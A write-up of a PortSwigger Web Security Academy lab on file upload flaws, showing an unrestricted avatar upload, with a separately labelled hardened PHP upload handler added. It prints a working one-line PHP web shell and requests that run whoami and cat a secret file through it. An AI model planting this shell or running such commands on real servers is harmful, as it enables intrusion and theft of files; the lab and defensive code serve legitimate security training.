Platform: PortSwigger Web Security Academy
Type: File Upload Vulnerabilities
Difficulty: Apprentice
Objective: Upload a PHP web shell to the server and use it to read /home/carlos/secret

Remote Code Execution via Web Shell Upload

I logged in as wiener:peter and found an avatar upload function on the account page with no content-type restrictions, no extension filtering, and no mention of allowed file types.


I uploaded a minimal PHP command shell as tetoshell.php:

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
The file avatars/tetoshell.php has been uploaded.

No validation — the file landed at /files/avatars/tetoshell.php in a web-accessible directory served by the PHP interpreter. The upload path matters as much as the upload itself: a non-web-accessible directory, or a server that doesn't pass .php files to the interpreter, would break the attack.
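For contrast, the handler below is an added example (not code from the lab or from this write-up) showing how an avatar upload closes each of the gaps just described: content sniffing instead of trusting the client's Content-Type, re-encoding the image, a server-chosen filename, and storage outside the web root with a separate serving route. It assumes the fileinfo and GD extensions are available and that UPLOAD_DIR is a directory the web server does not serve directly.

```php
<?php
// Added example (not from the lab or this write-up): a hardened avatar upload
// handler that closes each gap noted above. Requires the fileinfo and GD
// extensions; UPLOAD_DIR is an assumed path outside the web root.

const UPLOAD_DIR = '/var/www/uploads_private/avatars';   // not web-accessible
const MAX_BYTES  = 512 * 1024;
const ALLOWED    = ['image/png', 'image/jpeg', 'image/gif'];

function store_avatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the type from the bytes; ignore the client's Content-Type header
    // and the original filename, both of which the uploader controls.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED, true)) {
        throw new RuntimeException('unsupported image type');
    }
    // Decode and re-encode so any PHP embedded in the image data is discarded.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-chosen name and extension: nothing user-supplied reaches disk.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.png';
    if (!imagepng($img, $dest)) {
        throw new RuntimeException('could not write avatar');
    }
    imagedestroy($img);
    return basename($dest);
}

// Avatars are read back through this route and returned as image bytes, so the
// PHP interpreter never executes anything stored under UPLOAD_DIR.
function serve_avatar(string $name): void
{
    $path = UPLOAD_DIR . '/' . $name;
    if (!preg_match('/^[0-9a-f]{32}\.png$/', $name) || !is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: image/png');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

Even with this in place, the web server configuration still needs to refuse to hand files under the upload directory to the PHP interpreter, since the serving route is only safe as long as it is the sole path to those bytes.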

Confirming RCE:

/files/avatars/tetoshell.php?cmd=whoami

Returns carlos. Reading the secret:

/files/avatars/tetoshell.php?cmd=cat%20/home/carlos/secret

File contents returned directly in the response. Submitting the secret:


And the lab is solved.
